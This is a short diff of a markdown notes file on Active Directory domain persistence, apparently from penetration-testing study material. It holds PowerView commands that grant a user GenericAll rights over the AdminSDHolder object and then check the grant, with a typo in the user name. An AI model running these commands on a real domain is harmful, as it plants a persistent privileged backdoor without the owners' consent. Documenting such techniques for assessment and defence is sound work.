NyaMeeEain/Infrastructure-Assessment/DOMAIN PERSISTENCE.md

 The User John has granted GenericAll Privilege.

+Add-ObjectAcl -TargetADSprefix 'CN=AdminSDHolder,CN=System' -PrincipalSamAccountName Joh -Verbose -Rights All

+#The Following could be verify whether The unprivilege user John has GenericAll rights on the AdminSDHolder.

-Add-ObjectAcl -TargetADSprefix 'CN=AdminSDHolder,CN=System' -PrincipalSamAccountName Joh -Verbose -Rights All Get-ObjectAcl -SamAccountName "Domain Admins" -ResolveGUIDs | ?{$_.IdentityReference -match 'John'}
+Get-ObjectAcl -SamAccountName "Domain Admins" -ResolveGUIDs | ?{$_.IdentityReference -match 'John'}

 ```